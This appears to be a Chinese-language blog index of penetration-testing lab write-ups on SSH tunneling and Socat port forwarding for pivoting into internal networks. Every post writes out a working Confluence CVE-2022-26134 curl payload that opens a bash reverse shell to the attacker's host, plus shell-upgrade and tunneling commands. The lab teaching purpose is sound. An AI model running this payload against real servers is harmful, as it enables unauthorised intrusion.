發表文章

目前顯示的是有「linux」標籤的文章

SSH Tunneling - Remote Dynamic Port Forwarding

圖片
 SSH Tunneling - Remote Dynamic Port Forwarding 延續上一節的遠端連接 Port 與上上節的動態連接 Port 這一次做到遠端動態連接 Port,場景簡單說明如下圖 要記得走動態的的方式都是透過 SOCKS 格式的封包傳送(相當的慢),然後透過 proxychains 環境說明攻擊機 192.168.45.186 靶機 192.168.250.63(Web)、10.4.250.215(DB)、192.168.250.63(同網段不對外伺服器) 示意圖如下 一樣漏洞進入 192.168.250.63 curl -v http://192.168.250.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.186/4444%200%3E%261%27%29.start%28%29%22%29%7D/ 為了使用使用者名稱和密碼連接回 Kali SSH 伺服器,必須透過在 /etc/ssh/sshd_config 中將PasswordAuthentication 設定為 yes 來明確允許基於密碼的身份驗證 然後確保 TTY python3 -c 'import pty; pty.spawn("/bin/bash")' 然後 ssh -N -R 9998 kali@192.168.45.186 攻擊機的 9998 Port 對應好了 然後要記得修改 /etc/proxychains4.conf 中的 Proxychains 設置如下 Web Server 上有兩隻腳  - ens192 : 192.168.250.63  - ens224 : 10.4.250.63 for i in $(seq 63 65); do ping  -c 1 10.4.250.$i; done,知道同網段的 IP...

SSH Tunneling - Remote Port Forwarding

圖片
SSH Tunneling - Remote Port Forwarding 攻擊機 192.168.45.199 靶機 192.168.215.63、10.4.215.215 此環境限制是靶機端因防火牆的配置使得在 CONFLUENCE01 的 WAN 介面上綁定的端口無法順利連接,可以從 Kali 攻擊端機器連接到靶機的唯一端口是 TCP 8090 本次要利用的場景環境示意圖如下 將透過 SSH 從 CONFLUENCE01 連接到我們的 Kali 攻擊機器 Listen TCP 2345 Port 並綁定到 Kali 攻擊機器上的 loopback interface 傳送至此連接埠的封包由 Kali SSH 伺服器軟體透過 SSH 隧道推送回 CONFLUENCE01 上的 SSH 用戶端。然後它們被轉送到 PGDATABASE01 上的 PostgreSQL 資料庫連接埠。 第一步先確認 Kali 攻擊機上的 OPENSSH 服務啟動 指令 sudo systemctl start ssh 為了使用使用者名稱和密碼連接回 Kali SSH 伺服器,必須透過在 /etc/ssh/sshd_config 中將PasswordAuthentication 設定為 yes 來明確允許基於密碼的身份驗證 一樣先漏洞利用連回攻擊機 4444 Port 拿到 Remote Shell curl -v http://192.168.215.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.199/4444%200%3E%261%27%29.start%28%29%22%29%7D/ 然後確保 TTY python3 -c 'import pty; pty.spawn("/bin/bash")' 然後透過 連回 Kali SSH 並起 loopback 23...

SSH Tunneling - Local Port Forwarding

圖片
 SSH Tunneling -  Local Port Forwarding 讓我們回想一下上一篇 Socat 場景中的第一個連接埠轉送範例。我們將 Socat 設定為偵聽 CONFLUENCE01 WAN 介面上的 TCP 連接埠 2345。在該連接埠上收到的封包被轉送到 PGDATABASE01 上的 TCP 連接埠 5432。我們使用它從 Kali 機器透過 CONFLUENCE01 連接到 PGDATABASE01 上的 PostgreSQL 服務。在這種情況下需要注意的關鍵一點是偵聽和轉送都是從同一台主機 (CONFLUENCE01) 完成的。 SSH 本地埠轉送對此新增了一個小改動。使用 SSH 本機連接埠轉發,封包不會由偵聽封包的相同主機轉送。相反,在兩個主機(SSH 用戶端和 SSH 伺服器)之間建立 SSH 連接, SSH 用戶端打開一個偵聽端口,並且在此端口上接收到的所有數據包都通過 SSH 連接通過隧道傳輸到SSH 伺服器。然後封包由 SSH 伺服器轉送到我們指定的套接字。 稍微修改一下先前的場景:Socat 現在在 CONFLUENCE01 上不再可用。我們仍然擁有之前從 Confluence 資料庫破解的所有憑證,並且仍然沒有防火牆阻止我們連接到 CONFLUENCE01 上綁定的連接埠。 使用database_admin憑證,我們將登入PGDATABASE01並發現它連接到另一個內部子網路。我們在該子網路中找到一台開啟了伺服器訊息區塊(SMB) 伺服器(在 TCP 連接埠 445 上)的主機。我們希望能夠連接到該伺服器並將我們找到的內容下載到我們的 Kali 機器上。 在這種類型的場景中,我們將計劃建立一個 SSH 本地連接埠轉發,作為從 CONFLUENCE01 到 PGDATABASE01 的 SSH 連接的一部分。我們將在CONFLUENCE01的WAN介面上綁定一個監聽埠。發送到該連接埠的所有封包都將透過 SSH 隧道轉送。然後,PGDATABASE01 會將這些封包轉送到我們找到的新主機上的 SMB 連接埠。 攻擊機 192.168.45.187 靶機 192.168.198.63、10.4.198.215、172.16.198.217 使用一樣的 Confluence 漏洞拿 Reverse Shell c...

Socat 連接埠轉發

圖片
 Socat 連接埠轉發 環境說明 攻擊機 Kali IP : 192.168.45.200 DMZ 對外開放之 Web Server IP & Port : 192.168.229.63, 8090 靶機內網 DB IP : 10.4.229.215 第一步一樣先 rustscan 外網機器,僅開了 22, 8090, 8091 Port rustscan -a 192.168.229.63 --scripts none --ulimit 5000 nmap 列舉這三個 Port 服務,sudo nmap -sC -sV -p 22,8090,8091 192.168.229.63 22 是 SSH,8090 是 HTTP Service 8091 也是 HTTP Service whatweb 8090 發現是 Confluence 依據此網站介紹的 Confluence Web CVE 弱點 https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ 我們將利用以下這一段指令來建立 Reverse Shell POC 指令 :  curl -v http://192.168.229.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.200/4444%200%3E%261%27%29.start%28%29%22%29%7D/ nc 4444 進來了,whoami 確認是 confluence 服務帳號 ip ro or ip addr 查看網路確認有另外一隻腳 10.4.229.63 (ens224) 由於這是一個有限的服務帳號所以可以看到的東西不多,但一樣要進行枚舉 尤其服務帳號一定要看網站設定檔與 Log 結果在 ...